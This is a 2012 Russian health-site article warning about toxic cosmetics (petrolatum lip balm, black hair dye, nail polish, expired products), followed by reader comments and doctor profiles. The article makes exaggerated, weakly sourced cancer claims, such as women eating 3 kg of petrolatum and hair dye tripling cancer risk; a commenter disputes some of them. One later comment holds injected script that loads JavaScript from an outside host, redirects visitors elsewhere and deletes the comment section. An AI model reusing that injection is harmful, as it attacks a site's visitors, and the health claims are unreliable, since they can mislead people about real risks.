Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Насколько токсичен ваш до...  >>  Насколько токсичен ваш дом: Косметика
 
Обратная связь
 

Насколько токсичен ваш дом: Косметика

Размер шрифта
26 февраля 2012 09:55
  • google_analytics: false
  • Нравится

Косметика создана, чтобы делать женщин красивыми. Но знают ли женщины, как на них влияет косметика, которой они пользуются каждый день, лаки для ногтей или краска для волос? Три самых опасных предмета ухода за собой и четыре способа их обезопасить.

1 

  1. Помада на основе вазелина

Если вы пользуетесь такой помадой, знайте: за 10 лет вы съедаете 3 кг технического или нефтяного вазелина – основного ингредиента блесков для губ и гигиенических помад. Несмотря на запрет Евросоюза, такие помады и блески все еще выпускают. Эксперты предполагают, что есть прямая связь между действием вазелина на организм и возникновением рака.

У женщин с раком груди в молочных железах уровень гидрокарбона, вещества, найденного в техническом вазелине, вдвое больше, чем у женщин без рака.

Что делать

Покупать гигиеническую помаду на основе пчелиного воска.

  1. Черная краска для волос

У женщин, которые используют стойкую краску для волос хотя бы один раз в месяц, вероятность развития рака повышается в 3 раза.

Комиссия Международного агентства по исследованию рака (IARC) выступила с докладом, в котором утверждается, что парикмахеры подвергаются постоянному риску заболеть раком из-за частого контакта с краской для волос. В результате нескольких исследований была обнаружена связь между использованием красок для волос в быту и раком мочевого пузыря и, кроме того, лейкемией и лимфомой.

Стойкие (или окислительные) краски для волос занимают львиную долю (80%) всех красок на рынке. Они состоят из бесцветных веществ-проводников, которые, вступая в реакцию с перекисью водорода, обеспечивают окрашивание. Больше всего таких красящих веществ, в темных красках.

Так что, возможно, есть доля истины в предположении, что Жаклин Кеннеди-Онассис, постоянно применяя черную краску для волос, спровоцировала у себя появление рака крови – лейкоза.

Что делать

Вместо черной краски для волос использовать черную хну (это натуральный краситель) либо сменить цвет волос.

1

  1. Лак для ногтей

Ногти имеют пористую структуру, поэтому они все впитывают. В лаках для ногтей есть формальдегид, опаснейший канцероген.

Что делать

Не красьте ногти лаком хотя бы в выходные дни. Дайте им возможность отдохнуть и восстановиться.

  1. Срок годности косметики

Любое косметическое средство имеет срок годности. Он указан на этикетке мелким шрифтом. После истечения срока годности косметика может стать причиной дерматита или других проблем.

Что делать

Проверьте срок годности вашей косметики. Обратите внимание на значок «открытая баночка с цифрой». Эта цифра указывает, в течение какого количества месяцев можно использовать косметический продукт после вскрытия упаковки.

 

Сюжет по теме:
Насколько токсичен мой дом. Косметика
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

27 февраля 2012 в 13:04

Цитировать   |   Пожаловаться

В лаках для ногтей НЕТ ФОРМАЛЬДЕГИДА!!! На передаче Вы совершенно напрасно сказали, что лак пахнет формальдегидом! То, чем пахнет лак - не формальдегид, а растворитель (чаще всего этил- или бутилацетат). И еще: если используете переводной материал, переводите, пожалуйста, и химические названия. В русскоязычной литературе нет вещества гидрокарбон, есть только углеводороды!

helena 27 февраля 2012 в 13:04
В русскоязычной литературе нет вещества гидрокарбон, есть только углеводороды
 Вы правы. Спасибо за внимание к нашим материалам. 

3 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.